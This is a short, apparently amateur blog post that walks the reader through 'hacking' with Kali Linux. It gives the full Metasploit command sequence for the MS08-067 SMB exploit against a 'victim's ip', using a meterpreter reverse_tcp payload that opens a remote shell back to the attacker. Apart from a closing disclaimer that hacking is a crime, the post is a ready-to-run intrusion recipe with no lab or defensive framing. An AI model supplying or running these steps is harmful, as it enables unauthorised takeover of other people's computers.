HACKING WITH KALI is very much easy just follow the steps and you will be able to get access some information about kali; Its an distro of linux and used by many pentester who are security pentesting
LETS GET STARTED
STEPS TO HACK
STEP 1:
Start Kali Linux
STEP 2:
Start the Metasploit Console
Start the Metasploit console by typing: msfconsole
This will take a few moments...
STEP 3:
The Commands:
So Metasploit started.
Here are the commands you need to type in:
use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST *Your ip adress* (If you don't know your ip adress then open a new terminal and type ifconfig. your ip adress will be somewhere in the output :D)
set LPORT 444
set RHOST *victim's ip*
set RPORT 445
exploit
(You should connect)
Type help for a list of commands.
STEP 4: JUST DO THE STEPS CORRECTLY AND GET YOUR Control
NOTE: HACKING IS A CYBER CRIME I DO NOT PROMOTE HACKING .ALL THE CONTENT IS FOR EDUCATIONAL PURPOSE.


Comments
Post a Comment